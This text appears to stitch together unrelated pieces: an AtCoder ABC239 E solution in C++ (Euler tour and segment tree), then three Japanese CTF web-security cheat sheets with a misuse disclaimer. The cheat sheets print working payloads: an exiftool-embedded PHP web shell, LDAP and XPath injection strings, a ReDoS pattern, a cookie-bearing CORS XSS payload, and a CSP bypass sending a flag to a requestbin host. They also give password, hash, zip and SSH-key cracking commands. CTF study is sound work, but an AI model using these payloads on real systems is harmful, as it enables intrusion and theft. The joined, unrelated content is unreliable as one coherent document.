https://atcoder.jp/contests/abc239/tasks/abc239_e

前提知識

• オイラーツアー
• セグメントツリー

解説

https://atcoder.jp/contests/abc239/submissions/29488895

データ構造でゴリ押して解けそうな感じもするし、Kの値が小さいことを利用して、楽に解くこともできそうではある。
根付き木の部分木に対する操作ではオイラーツアーが有効な場面が多々ある。

部分木に対する操作を配列の特定区間に対する操作に変換する

オイラーツアーを使うと部分木を配列の特定区間にマッピングすることができる。
初めて聞く場合は何を言っているのか分からないと思うが、かなり便利なので検索して学習してこよう。
オイラーツアー - Google 検索
（ちょっと、ここに書くには余白が少なすぎる…）

オイラーツアーを使って部分木からインデックスを作成して、頂点Vに対する部分木に対応する区間が[L,R)に対応すると
分かったとする。すると、今回の問題を以下のように読み替えることができる。

頂点Vに対する部分木に含まれる数のうちK番目に大きい数は？
↓
配列の区間[L, R)に含まれる数のうちK番目に大きい数は？

これで木であるということは無視してよくなるので、だいぶ今までの知見を活かしやすくなった。

特定区間のK番目に大きい数は？

これはWaveletMatrixというデータ構造を使用すると高速に取得できる。
しかし、結構高度なデータ構造なので、今回は、Kが小さいことを利用してセグメントツリーで解くことにする。
セグメントツリーを使えば最も大きい数というのは取得が可能である。
今回の問題ではK≦20と小さいので、

最も大きい数を取得する
→ 一旦それを除外する（正確には除外というか-1で更新する）
→ 最も大きい数を取得する（2番目に大きい数が得られる）
→ 一旦それも除外する
→ 最も大きい数を取得する（3番目に大きい数が得られる）

みたいなことを繰り返してK番目に大きい数を取得することにする。
取得した後は、除外した項目をセグメントツリーに戻してやることで取得操作の過程で壊れてしまった
セグメントツリーを復元していく。
こうすると、全体的な計算量はO(NKlogN)となり、K≦20,N≦10⁵で2secだとちょっと不安な気もするが、
操作も比較的単純で定数倍も小さそうということもあり、まあ通るかという感じ。

advancedな話

• wavelet matrixをやればストレートに区間問題パートが解けるので勉強してみるのも面白い
• 自分の解法では消してundoみたいなことをしているが深堀したい場合は「永続化セグメントツリー」のような永続データ構造を調べてみても面白い

int N, Q, X[101010];
vector<int> E[101010];
int V[101010], K[101010];

int L[101010], R[101010];
int idx = 0;
void euler(int cu, int pa = -1) { // [L[v],R[v])
    L[cu] = idx; idx++;
    for (int to : E[cu]) if (to != pa) euler(to, cu);
    R[cu] = idx;
}

SegTree<1<<17> st;
void _main() {
    cin >> N >> Q;
    rep(i, 0, N) cin >> X[i];
    rep(i, 0, N - 1) {
        int a, b; cin >> a >> b;
        a--; b--;
        E[a].push_back(b);
        E[b].push_back(a);
    }
    rep(i, 0, Q) cin >> V[i] >> K[i], V[i]--;

    euler(0);

    rep(i, 0, N) st.update(L[i], { X[i], L[i] });
    
    rep(q, 0, Q) {
        int l = L[V[q]], r = R[V[q]];
        vector<pair<int, int>> buf;
        rep(k, 0, K[q] - 1) {
            auto p = st.get(l, r);
            buf.push_back(p);
            st.update(p.second, { -1, -1 });
        }

        auto p = st.get(l, r);
        printf("%d\n", p.first);
        fore(p, buf) st.update(p.second, p);
    }
}

この記事はCTFのWebセキュリティ Advent Calendar 2021の25日目の記事です。

本まとめはWebセキュリティで共通して使えますが、セキュリティコンテスト（CTF）で使うためのまとめです。
悪用しないこと。勝手に普通のサーバで試行すると犯罪です。

脆弱性を利用する

• 問題によっては脆弱性を突いた問題がある
  • 時事ネタが多い気がする。ゼロデイやワンデイという感じ
• ソースコードが配布されていて、バージョンが固定されたライブラリを使っているなら怪しい

Dependency Confusion

• Dependency Confusion: How I Hacked Into Apple, Microsoft and Dozens of Other Companies | by Alex Birsan | Feb, 2021 | Medium
  • 発祥の地
• 対象
  • レポジトリシステム, Maven Central(Gradleも？), npm, NuGet, PyPl
• AzureのWhite paper
  • 各レポジトリでのmitigationも書いてある
• Preventing Dependency Confusion in PHP with Composer
  • PHPでの話
• Change methodology for installing Helix scripts to ensure we get the … · dotnet/dotnet-buildtools-prereqs-docker@56c6673 · GitHub
  • --extra-index-urlで指定されていても一般公開されているもののバージョンが高ければ、そっちがとってこられる
• PoC？チェックツール？
  • https://github.com/visma-prodsec/confused
• Challenges
  • CTFtime.org / H@cktivityCon 2021 CTF / SpiralCI
    • 初めて題材になっているのを見た
    • パッケージをnpmに公開する方法（業界のやり方）| Zell Liewで作れる
    • packages.jsonでscruptsの所にpreinstallとして任意コードを配置しておくとRCEできる。今回はログ出力もされているので、標準出力に出してやれば見られる

DoS

• セキュリティ的にも問題とされる。情報は抜かれないが、事業停止に追いやることができる。CTFではあまりテーマとして出題されない。
  • でも解法でDoSが思いついても、解法にかなり確信度が無い限りやらないことを勧める（もしかしたらサーバ壊すかも）
• 何がDoSの原因となるか？
  • 再帰的な構造があるもの
  • 指数関数的に伸びる可能性があるもの
    • jsonのparseとか（深さが深いとバッファが食われる）
  • 受け付けるサイズの上限がない場合
  • 格安ホスティングにより、ほかの人がDoSを受けると影響を受ける
  • エラーを起こすような入力を与えることで、StoredXSSの要領でそのページを開くときに毎回エラーを発生させて、画面表示させないようにできる
• 資料
  • DDoS攻撃を解説—その原因、影響、サイトを保護する方法とは？

Git系

• /.gitを試してみて、404以外だったら抜けるか試してみる
• バージョン管理情報も一緒にアップロードされてるときに情報を抜ける
  • 【2019年】CTF Web問題の攻撃手法まとめ (Web問題のwriteupぜんぶ読む) - こんとろーるしーこんとろーるぶい
• ネット上に上がっているレポジトリを持ってくるとき
  • GitHub - arthaud/git-dumper: A tool to dump a git repository from a website
    • ./git-dumper.py http://website.com/.git ~/website
  • GitHub - C-Sto/GoGitDumper: Dump exposed HTTP .git fast
    • gogitdumper -u https://constellations.page/.git/ -o .git/
• Gitのファイルがありそうなとき
  • /home/gitserver/.git/HEADを見てみる
  • /home/gitserver/.git/logs/HEADで修正ログが見られる
• テク
  • Gitでやらかした時に使える19個の奥義 - Qiita
  • git log
    • git log -p
      • 修正内容も含めて全部持ってくる
    • git log -p > log && cat log | grep -Ei "flag{"
      • flag{を抽出するコマンド
    • > git log --oneline --stat > log.txt
      • いい感じのlogを出すコマンド
  • git rev-list --objects --all
    • 過去コミットのオブジェクトを全部持ってくる
    • git cat-file --batch --batch-all-objectsで全部表示できる
  • CTFtime.org / RITSEC CTF 2021 / Corruption
    • 壊れてるっぽいけど、頑張って復元してる

SVGへの攻撃方法

ImageMagick

• 画像処理ライブラリ。
• 脆弱性が多い
  • 2016年：ImageTragick (CVE-2016-3714 ～ CVE-2016-3718)
    • 「ImageMagick」の脆弱性、遠隔でのコード実行が可能に | トレンドマイクロ セキュリティブログ
    • RCE。MVG(ImageMagickの独自規格) やSVGといったベクター画像にコマンドを埋めこんで実行する。
    • exploitコード：ImageTragick
    • #402362 RCE due to ImageTragick v2
      • ghostscript RCEが使える脆弱性があるらしい
    • MDL Considered Harmful - CTFs
      • jsonからの入力例で攻撃成功しているものがある（LFI）
      • テキスト入れるところに@/opt/flag.txtと置くとLFIできる
  • 2017年：Yahoobleed
    • メモリ初期化漏れ
    • PoCしてないので違う可能性あり
    • メモリ解放後の領域を盗み見ることで、情報をリークさせるもの
    • Yahoobleed - YoyaWiki Plus!
  • 2016, 2018年：Tavis OrmandyによるImageMagickでの外部プログラム（Ghostscript）のサポートがどのようにリモート実行につながるかを示す
    • InsertScript: ImageMagick - Shell injection via PDF passwordで言及
  • 2020年：ImageMagick-PDFパスワードによるシェルインジェクション
    • InsertScript: ImageMagick - Shell injection via PDF password
    • PDF作成時の設定パスワード部分でシェルインジェクションが行える
    • これはCLI実行時もそうであるが、MSL形式経由でパスワードを指定しても同様のコマンドインジェクションが達成できる
• 気になること
  • ImageMagickでは、次の構文を使用して特定のハンドラーを設定することもできます。convert msvg:test.svg out.png
    • これは考慮されてない場合多そう
• 対策について
  • ImageMagickを使うWebアプリのセキュリティ - 1. 既知の脆弱性、システム情報の漏洩 | MBSD Blog
  • 「さようなら ImageMagick」の考察 - Qiita
  • アップロード画像による Web サイト乗っ取りが可能な脆弱性とその対策 – Naked Security
• InsertScript: ImageMagick - Shell injection via PDF password
  • odt:/etc/passwd, html:/etc/passwdとするやりかたもある
• 資料
  • ImageMagickを使うWebアプリのセキュリティ - 1. 既知の脆弱性、システム情報の漏洩 | MBSD Blog

GraphicsMagick

• コマンドインジェクションできる場合に属性とかで悪さができる。
• HackerOneに報告された脆弱性をHackEDUで再現する - Akaki I/O
  • -rotate 90を差し込んで回転するか確認（これはImageMagickでも有効らしい）

SVG Writeups

• 【2019年】CTF Web問題の攻撃手法まとめ (Web問題のwriteupぜんぶ読む) - こんとろーるしーこんとろーるぶい
• 【2019年】CTF Web問題の攻撃手法まとめ (Web問題のwriteupぜんぶ読む) - こんとろーるしーこんとろーるぶい
• CTFtime.org / P.W.N. CTF / SVG2PNG / Writeup
• 0CTF/TCTF 2018 Quals h4x0rs.space Writeup (Web 1000)
• X-CTF Finals 2016 - John Slick (Web 25) – Quan Yang
• Midnight Sun CTF 2019 Quals - Rubenscube | JBZ CTF Team
• BsidesSF CTF 2019 - svgmagick | Root Network Security
• GoogleCTF 2019 GPhotos writeup

Exif

• ExifTool において DjVu 形式ファイルの検証不備により任意のコードが実行されてしまう脆弱性（Scan Tech Report） | ScanNetSecurity
• exiftoolを使って、メタデータに悪意のある入力を埋め込む
  • exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); >?' pic.jpg
• アップロード時にgeo-location情報は削除すべき？
  • Exif Data Exposure. Summary : | by Jerry Shah (Jerry) | Medium

LDAP

• LDAPが裏で動いているかの確認
  • 検索フォームで以下のような感じなら怪しい
    • *で検索すると全部でてくる
    • (で検索するとエラーになる
      • エラー例 Error: {'result': -7, 'desc': 'Bad search filter', 'errno': 11, 'ctrls': [], 'info': 'Resource temporarily unavailable'}
  • emailがXXX@YYY.localなら怪しい
• LDAP Filter Injection
  • Understanding and Defending Against LDAP Injection Attacks – LDAP.com
  • String filter = "(|(uid=" + userInput + ")(mail=" + userInput + "))";
    • こんな感じにフィルターを作っていた場合にインジェクションできるよという話。
    • ルールはこんなかんじ7.4 LDAP検索フィルタ
    • 使える属性 マッピング可能なLDAP属性（データベース連携） | ADManager Plus ナレッジベース
      • ある問題ではdescriptionにヒントが書いてあったパターンがある（パスワードがそのまま書いてある場合も）
  • どう悪用するかというと、
    • String filter = "(|(displayName=" + userInput + ")";こうなってたとする
    • これにAdmin*)(description=V*のように違う属性をインジェクションして、ワイルドカードで検索することで、表示されるされないでブラインドSQLiをして、descriptionの情報を抜き取れる
  • payload
    • mkiloa@dvctf.local)(description=*))%00&password=*
  • 総当りで一桁ずつ当てる方法がある
    • ユーザー名、OIDは全探索できる？
      • DaVinciCTF — Web Challenges — Writeup | by FHantke | Mar, 2021 | InfoSec Write-ups
        • email=mkiloa@dvctf.local)(userPassword:2.5.13.18:=\7b\4d\44\35\7d\41\<add the next byte here>))%00&password=*
      • Write Up : ECW 2018 - AdmYSsion · 0xUKN - (in)Security Blog
• 問題
  • CTFtime.org / HacktivityCon CTF / Lightweight Contact Book

Reflected File Download

• RFD Vulnerability And Content-Disposition Header Bypass Story! | by Kabilan S | Jul, 2021 | Medium

正規表現

• 正規表現によるバリデーションはバイパスできる可能性が高い
  • シンプルでない正規表現はバイパス検討してみよう
  • 改行、大文字小文字、文字コード、普通に書き間違えて先頭・末尾指定が無いとか
• regex - Difference between \A \z and ^ $ in Ruby regular expressions - Stack Overflow
  • 先頭末尾は^ ... $とするか\A ... \zとするかの選択肢があるが、後者の方が強い制約になる。\zと\Zはセキュリティ的にはそんなに変りない。
• re.sub(r'([^_\.\sa-zA-Z0-9])', r'\\\1', s)
  • とやると\nは変換されない
• regexpパズル
  • CTFtime.org / THC CTF 2021 / Expressive Expressions

ReDoS

• ReDoSとは
  • Regular Expression DoS The Regular Expression Denial of Service (ReDoS) cheat-sheet | by James Davis | May, 2020 | Level Up Coding
  • 正規表現を使ったDoS手法
  • 正規表現に入力が入る場合は疑ってもいいかも
  • 日本語資料が最近沢山ある
    • その正規表現、異議あり！ 〜 ReDoSについて - Speaker Deck
    • ^ReDoSの色々$ - Speaker Deck
  • 正規表現ソルバの実装によっては最悪計算量が指数関数になる場合があり、最悪計算量となるように評価式を作ることで、サーバに負荷をかけることができる
    • Algorithmic complexity attack - Wikipedia
    • こういう分野らしい。ZIP爆弾とかもそうなのか
  • 正規表現の評価時にありうるパターンを全探索することで、組合せ爆発が起こるために発生する
  • メールアドレスでのReDoS
    • 正規表現でのメールアドレスチェックは見直すべき – ReDoS – yohgaki's blog
    • 例）secconbeginner@host.abcde.abcde.abcde.abcde.abcde.abcde.abcde.abcde.abcde.abcde.
• google/re2: RE2 is a fast, safe, thread-friendly alternative to backtracking regular expression engines like those used in PCRE, Perl, and Python. It is a C++ library.
  • Google作の安全な正規表現ソルバ。しかし、これを使っていても普通に重い正規表現では重くなる
    • CTFtime.org / TSG CTF 2020 / Slick Logger
  • TSG CTF 2020 作問感想 - 博多電光
    • RE2はAutomaton-basedであり、長い正規表現で状態数を増やせば、単純に計算を重くすることができ、ReDoSっぽいことができる
• ペイロード
  • 正規表現を使ったDoS – ReDoS – yohgaki's blog
  • 正規表現の落とし穴（ReDoS - Regular Expressions DoS） - Qiita
  • ctf-writeups/note2.md at master · mdsnins/ctf-writeups
    • ^TSGCTF.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?!
• 対策方法
  • その正規表現の書き方で大丈夫？ ReDoS 攻撃の怖さと対策方法 | yamory Blog
    • やはり、文字数制限
    • ReDoSは正規表現ライブラリの脆弱性なので、ライブラリの最新化で治ることがある
  • 正規表現が安全であるかツールで確認
    • substack/safe-regex: detect possibly catastrophic, exponential-time regular expressions
• 問題

Blind Regular Expression Injection Attack

聖典：A Rough Idea of Blind Regular Expression Injection Attack – やっていく気持ち
聖典から聖典が生まれていた → Revisiting ReDoS: A Rough Idea of Data Exfiltration by ReDoS and Side-channel Techniques - Speaker Deck

• これは何？
  • ReDoSによるレスポンス遅延をオラクルとしたサイドチャネル攻撃
  • 以下、想像（ちゃんと読んでない）
  • 正規表現にマッチしないと全探索をする必要があって、遅くなる
  • なので、「正規表現にマッチ→正解、マッチしない不正解」となるように正規表現を組み、応答時間を測ることで、情報を1文字ずつ抜き取る
• 問題
  • CTFtime.org / TSG CTF 2020 / Slick Logger
    • ^flag(.?){1000}(.?){1000}(.?){1000}(.?){1000}(.?){1000}...(.?){1000}salt$先頭がflagなら後続評価がされてすごく遅くなる

Unicode

• 正規化を狙った攻撃がある
  • Python 3.7.2の脆弱性
    • 課題 36216: CVE-2019-9636: urlsplit does not handle NFKC normalization - Python tracker
    • https://example.com\uFF03@bing.comにGETすると、https://example.comにアクセスされるがbing.comがホスト名になる
• HostSplit
  • Black Hat USA 2019: 今注目すべき Web セキュリティ関連トピックの解説 - Flatt Security Blog
  • ℀を使ったホスト偽装
• Unicodeを悪用するホモグラフ攻撃
  • IDNホモグラフアタック用ドメイン生成ツール EvilURL | うざ夫のうざブログ
    • GitHub - UndeadSec/EvilURL: Generate unicode evil domains for IDN Homograph Attack and detect them.
      • punycodeによる無茶苦茶判別しにくい見た目一緒なドメインを作るツール
    • IDNとはInternationalized Domain Name
    • 実際こういったドメインが必要なのはまれなので、社内プロキシでpunycodeは一律弾いてもいいのでは
      • xn--で始まるDNSクエリはログを記録し、モニタリングしておくのもいい
  • Unicodeで絶対知っておくべきセキュリティ5つの注意（翻訳）｜TechRacho（テックラッチョ）〜エンジニアの「？」を「！」に〜｜BPS株式会社
    • Creative usernames and Spotify account hijacking : Spotify Engineering
• 怪しい文字列を打ちたいとき
  • IncognitoCTF/AstralPlane.md at main · Class-3E/IncognitoCTF · GitHub
  • 2文字で表現している

XPath Injection

• picoCTF2021 [Web Exploitation] writeup - 好奇心の足跡
  • かなり良質なWriteup
  • ユーザーblah' or 1=1 or 'a'='aパスblahを試してみて成功すればXPATHiっぽい
    • //Users[UserName/text()='username' And Password/text()='password']となってるイメージ
  • Blind SQLiっぽい感じにBlind XPath Injectionもできる
    • そのためにはsubstringを取る必要があり、そのためにかカラム名が必要になる
      • それも長さとかguessとか諸々頑張るとできる
      • カラム名がわかったらsubstringで1つずつ特定していく
    • Cyber Apocalypse CTF 2021 Writeup | y011d4.log
• CTFtime.org / Cyber Apocalypse 2021 / E.Tree
  • 適当にエラーを出したときにlxml.etree.XPathEvalErrorが出たらチャンス
  • /militaty/distinct/staff[name='[userinput]']というクエリの場合は
    • x' or 任意条件 or 'x'='yみたいにインジェクションすると任意条件が満たされれば出てきて、そうでないなら出てこないようにできる
    • あとはstarts-withを使って先頭から順番に文字を探していく x' or //staff[starts-with(selfDestructCode, '{flagAttempt}')] or 'x'='y
  • 他インジェクション例
    • "a'] or substring((//staff[position()=2]/selfDestructCode/text()),1,1)='4' or /staf[nam='a
    • ' OR count(//selfDestructCode)=2 OR 'a'='
• 未分類
  • XPATH Injection : Iterating through element and Entities
  • Basics XPATH Injection
  • Basics of XPATH for XPATH Injection 1
  • Basics of XPATH for XPATH Injection 2

この記事はCTFのWebセキュリティ Advent Calendar 2021の23日目の記事です。

本まとめはWebセキュリティで共通して使えますが、セキュリティコンテスト（CTF）で使うためのまとめです。
悪用しないこと。勝手に普通のサーバで試行すると犯罪です。

パスワードクラック

• 推測で入れてみる
  • 本当に適当に入れてみる。CTFでは推測でこんなユーザーパスがあるのでは？で入れると通ったりする
  • guest:guest user:password admin:admin
• 初期ユーザーパスワードで入れてみる
  • phpmyadmin
    • root:が初期値なので、変更しないとこれでログイン可能。ユーザー名がrootでパスワードが空白
  • ihebski/DefaultCreds-cheat-sheet: One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password 🛡️
    • デフォルトクレデンシャルがまとまってる
• 辞書攻撃
  • パスワードはみなよくある文字列を使ってしまう傾向がある
    • rockyou.txt
      • CTFではとりあえずこれ使っておけばいい
    • GitHub - danielmiessler/SecLists: SecLists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more.
      • SecListsもよく使われる。
      • gobusterでDiscovery/Web-Content/を使うのもいい選択
  • よく使われるパスワードについて辞書を用意しておき、かたっぱしから試行すると成功する場合がある
  • https://wiki.skullsecurity.org/Passwords
    • ここで紹介されてるrockyou.txtがよく使われる。
    • なお、14,341,564（15 millionある）
    • 手元での解析で主に使用される
  • https://github.com/rootphantomer/Blasting_dictionary/blob/master/%E5%B8%B8%E7%94%A8%E5%AF%86%E7%A0%81.txt
    • Webサイトの辞書攻撃で使われててた
    • burpでやるとき
      1. Intruderに送る
      2. Positionsで入れ替えたい部分を$pass$とする
      3. PayloadsでSimple listにして、Load...でファイル読み込む（tools/webpass.txt)
      4. Start attackする
      5. Lengthが異なるものが大体答え
• パスワードのより深い推測
  • 得られた情報からパスワードリストを作成してそれを使って試行する
    • OSINTで使いそうなワードを探して推測する
  • 誕生日などで組合せリストを用意して試す
• 総当たり（ブルートフォース）、リバースブルートフォース
  • IDを固定してパスワードを総当たりすると、ブルートフォース
  • PASSを固定してIDを総当たりすると、リバースブルートフォース
    • ログインロックはID単位でやってることが多いから、ログインロックを回避可能（なるほど）
• パスワードスプレイ攻撃
  • 基本的にはリバースブルートフォールと一緒であるが、IDを順番に変えていって最後まで行ったら、パスワードを別のありそうな値に変えてIDを再度全探索していく
• パスワードリスト攻撃
  • 流出したID・パスワードを使ってログイン試行をすること、リスト型攻撃とも書かれたりする
  • 【セキュリティ ニュース】LINEにPWリスト攻撃 - 2段階認証未適用の問合フォームが標的に（1ページ目 / 全1ページ）：Security NEXT
    • 2FAはすべての部分に採用しないと、弱い所がこのように疲れる。

ハッシュ値の原文の特定・署名の秘密鍵の特定

• どのハッシュ関数を使ったハッシュ値か
  • hash-identifierを使って特定するのがいい
  • jobertabma/transformations
    • 原文とハッシュ値が分かっていれば、ハッシュ化関数を特定可能
  • Hash Type Identifier - Identify unknown hashes
  • Hash Analyzer - TunnelsUP
  • Online Free Hash Identification identifier: find 250+ algorithms | Online Hash Crack
    • 種類数が多い
• ハッシュ値をもとに戻す
  • crackstation
    • ここに通せば出てくるかも
  • https://hashes.com/en/decrypt/hash
    • 一気に戻せる
  • https://sckull.github.io/posts/hashes/#2-sha1
• 辞書攻撃・総当たり

ツール

pythonでゴリゴリ書いてもいいが、どうしても遅いのでクラッカーを積極的に使用しよう。

hashcat

• パスワードクラッカー、早い。全探索でcrackするときは、pythonとか使わずにこっち使おう。
• ./hashcat.exe -m 3200 hash.txt ../dic/rockyou.txt
  • 辞書攻撃するときこんな感じ
• hashcatを使って変形辞書を作ることもできる
  1. ruleというファイル名で変形前の辞書を保存する
  2. hashcat.exe -r rules/best64.rule --stdout rule > dic.txtで変形辞書を作成
• ハッシュ関数を変えたいときは-mで変える。
  • https://hashcat.net/wiki/doku.php?id=hashcat
  • ここに対応表が書いてあるので、md5(md5(pass))であれば-m 2600のように指定する。
  • 使用済み
    • 3200 bcrypt $2*$, Blowfish (Unix)
    • 100 SHA1
    • 1400 SHA2-256
    • 900 MD4
    • 0 MD5
    • 2600 md5(md5($pass))
    • 4400 md5(sha1($pass))
    • 1000 NTLM
    • 160 HMAC-SHA1 (key = $salt)
      • hash.txtにhash:saltとすればいい
    • 1800 sha512crypt $6$, SHA512 (Unix)
    • 16500 JWT (JSON Web Token)
      • hash.txtにJWTを直に置けばいい
• hashcatでshadowファイルを解析する例
  • DawgCTF 2021 Writeups – rainbowpigeon
• ハッシュについて
  • bcrypt - Wikipedia
    • $1$: MD5ベースの暗号('md5crypt')
    • $2$: Blowfishベースの暗号 ('bcrypt')
    • $sha1$: SHA-1ベースの暗号 ('sha1crypt')
    • $5$: SHA-256ベースの暗号 ('sha256crypt')
    • $6$: SHA-512ベースの暗号 ('sha512crypt')
• エラーハンドリング
  • Initializing backend runtime for device #1...となっている場合は--forceで待てば動くようになるかも
    • これでハングしてる場合は動いてない
• 原文がアラビア語の場合のクラック
  • Bitcrack's Bl0g: Cracking Hashes with Other Language Character Sets

John The Ripper

• パスワードの総合的なクラックツール。john --wordlist /usr/share/wordlists/rockyou.txt [hashpath]
• JWTの署名もクラック可能
  • https://security.stackexchange.com/questions/134200/cracking-a-jwt-signature
• Dockerで使うには
  • docker run -it -v d:\root\docker\jacktheripper:/root/ adamoss/john-the-ripper --wordlist /root/rockyou.txt /root/cracked.txt
• パスワード解析終えたら別コマンドでしか結果取得できないので注意
  • $ john --show users.txt実行コマンドに--showを入れるだけ
• フォーマット指定について
  • フォーマットを指定しなくても大丈夫だが、最初に大量にワーニングが出てこれじゃないみたいな提案をしてくれる。
  • 積極的に指定しないと駄目な場合も多い
  • フォーマット対応はjohnよりhashcatの方が多い
• .htpasswdのパスワード解析 admin:$apr1$1U8G15kK$tr9xPqBn68moYoH4atbg20 渡すだけでOK
• shadowのパスワード解析 $ john users.txt --wordlist=dic.txt
• private keyで要求されるパスワードを総当りで解析するには
  1. ssh2johnを使って、ハッシュ値に変換する（id_rsaを持ってくる）
  2. John The Ripperで解析 john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
  3. sshで使う $ ssh -i [prikey] [user]@[ip]

圧縮ファイルパスワードクラック

• ctf-tools/John/run at master · truongkma/ctf-tools · GitHub
  • ここにたくさん*2john.pyがある
• zip
  1. zip2john [zipfile] > ziphash.txtでハッシュを抜き出す
  2. john --wordlist=/usr/share/dirb/wordlists/rockyou.txt ziphash.txtみたいに解析
• 7z
  1. 7z2john ./chicken.7z > chicken.hashでハッシュを抜き出す
  2. john chicken.hash --wordlist=/usr/share/dirb/wordlists/rockyou.txt --format=7z-openclみたいに解析
• PGP鍵（private key）
  1. gpg2john [pgp key] > hash.txt
  2. john hash.txt --wordlist=/usr/share/dirb/wordlists/rockyou.txtみたいに解析
  3. gpg --import [gpg key (.asc)]
  4. gpg --decrypt [gpg file]
• jwt (HS256)
  1. jwtをそのままhash.txtとして保存
  2. john hash.txt
• johnは.john/john.potにクラックパスワードがキャッシュされている

Zip

既知平文攻撃

• 暗号化zipの中に平文がわかっているファイルがあれば、効率的に解析ができる
  1. 平文がわかっているファイルを含めて、非暗号zipファイルを作る
  2. zipファイルの圧縮環境の違いでうまく行かない場合があるので、その場合は7za L -sltで確認可能
  3. pkcrackでクラックする pkcrack -C ./with_password.zip -c mod_logo.jpg -P /tmp/mod_logo.zip -p mod_logo.jpg -d ./dec.zip
  4. -C [暗号化されたzipファイル]
  5. -c [暗号化されたzipファイルの中で平文がわかるファイル]
  6. -P [平文のファイルが入っている暗号化されていないzip] ←これはMUSTじゃない
  7. -p [平文のファイル]
  8. -d [出力先（復号したzipファイルの名前）]
• @Nperairさんのツイート
  • zipの標準の暗号化がゴミで、ファイルに12byteの既知の平文があれば既知平文攻撃で中身が読める
  • ファイルのフォーマットの都合上先頭12byteくらいはほぼ推測できてしまう
• 7zipであらかじめ開いてサイズを確認して、既知平文として正しいものかどうかを確認する
• DCTF-writeups/CompanyLeak.md at main · yulyachert/DCTF-writeups · GitHub
  • bkcrackというツールでもやれる

AES圧縮のzip

• zipファイルの新しいフォーマットではAES暗号化とかが使える
  • unzipで解凍をneed PK compat.みたいに出てきたら、古い可能性がある
  • そういう場合は7za e [filepath]とすると行える
• pythonならpyzipperを使えばいい
• crack例
  • UMDCTF SomeZips

johnとhashcat

• ctf/2021/dawg/forensics/photo_album at master · ryan-cd/ctf
  • 面白いやり方をしているzip2john encrypted.zip > pass_hash.txtとするとpkzip2という文字列を含むハッシュが得られたので、hashcatの 17200 | PKZIP (Compressed) | Archives 17220 | PKZIP (Compressed Multi-File) | Archives 17225 | PKZIP (Mixed Multi-File) | Archives 17230 | PKZIP (Mixed Multi-File Checksum-Only) | Archives 17210 | PKZIP (Uncompressed) | Archives 20500 | PKZIP Master Key | Archives 20510 | PKZIP Master Key (6 byte optimization) | Archives この一覧から17220を使って$ hashcat.exe -m 17220 -a 3 -1 ?l?d ?1?1?1?1?1?1?1?1 hash.txtで総当たりすると見つかる
  • 上と似ているが動かなかった。だが、下なら動いた
    • zip2john [file] | cut -d ':' -f 2 > hash.txtとしてhashcat -a 0 -m 13600 hash.txt --show

この記事はCTFのWebセキュリティ Advent Calendar 2021の21日目の記事です。

本まとめはWebセキュリティで共通して使えますが、セキュリティコンテスト（CTF）で使うためのまとめです。
悪用しないこと。勝手に普通のサーバで試行すると犯罪です。

CORS

CORS Misconfiguration

• SOPをbypassする機能がCORSであるが、制約を緩くしすぎて情報流出する場合がある
• 資料
  • 3 Ways You Can Exploit CORS Misconfigurations | we45

攻撃サンプル

• origin攻撃
  • *
  • *.target.com
  • target.com.evil.com
  • eviltarget.com
  • null
  • evil.com
• Exploiting misconfigured wildcard (*) in CORS Headers
  • Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true
  • どんなドメインでも受け入れてしまうので、XSSで読み込んむと内容が得られるので、この設定がなされていて応答に機微な情報が含まれていれば危険
• Using XSS to make requests to cross-origin sites
  • XSSがあると情報が抜ける
  • <script>function%20cors(){var%20xhttp=new%20XMLHttpRequest();xhttp.onreadystatechange=function(){if(this.status==200) alert(this.responseText);document.getElementById("demo").innerHTML=this.responseText}};xhttp.open("GET","https://www.redacted.com/api/return",true);xhttp.withCredentials=true;xhttp.send()}cors();</script>こんな感じに抜いてくればいい
    • Think Outside the Scope: Advanced CORS Exploitation Techniques | by Sandh0t | InfoSec Write-ups
• 攻撃
  • OriginがそのままACAOに反映される Origin: attacker.comでリクエストするとAccess-Control-Allow-Origin: attacker.comとなる
  • サブドメインでもOK Origin: attacker.com.evil.com で Access-Control-Allow-Origin: attacker.com.evil.comとか
  • wildcardになってる
  • null Origin: null
  • Verb変えてみる
• Advanced CORS Technique
  • 2018年に見つかった更なるテクニックがある
  • 発祥の地: Advanced CORS Exploitation Techniques – Corben Leo – infosec write-ups and ramblings
    • Safari限定で発現するもの
  • 一般には使えない文字を使ってbypassするもの。実際どれくらい脆弱性として認められるんだろう
• mitigation
  • Authoritative guide to CORS (Cross-Origin Resource Sharing) for REST APIs | Moesif Blog

CSP

• CSPの種類について
  • script-src-elem <script>alert(1)</script>や<script src="/jquery.js">
  • script-src-attr <svg onload="alert(1)">
  • base-uri <base href="https://example.com/">
    • 'none'か'self'にしておけばbaseがインジェクションされてもとりあえず大丈夫。追加理由ほとんどないんだしnoneでいいんじゃないかな？
    • none以外だったら、base tag injectionを疑うこと
  • connect-src
    • CSP: connect-src - HTTP | MDN
    • 制約対象が多いな。
    • connect-src http: https:;はガバガバ設定
  • img-src
• 推奨設定？
  • script-src 'nonce-{random}' 'unsafe-inline' 'unsafe-eval' 'strict-dynamic' https: http:;
  • object-src 'none';
  • base-uri 'none';
• 回避テク一覧
  • Content Security Bypass Techniques to perform XSS | Medium
  • Content Security Policy Level 3におけるXSS対策 - pixiv inside
• CSPが複数あれば、最も制約の厳しいものが採用される
  • Content-Security-Policy - HTTP | MDN
• CSP Evaluator
  • このサイトに通して弱点を探るのもいい
• CSP: Content Security Policy
  • 挿入されたjavascriptの実行を制約することで、XSSが成立しないようにする
  • サーバからブラウザへポリシーを伝えることで、そのポリシー以外の実行を制限する
  • content-security-policy:を見ると、許可されている操作が書かれているので、許可されてる範囲でバイパスを考える
• script-src
  • script-src 'self' data:;
    • script-srcのdataスキームが許可されている
    • <script src="data:text/javascript,ここに任意コード">
    • <script src="data:text/javascript,fetch('/csp-one-flag').then(x=>x.text()).then(x=>location='http://requestbin.net/r/1ax2j8w1?q='+escape(x))">
  • script-src 'self' ajax.googleapis.com 'unsafe-eval';
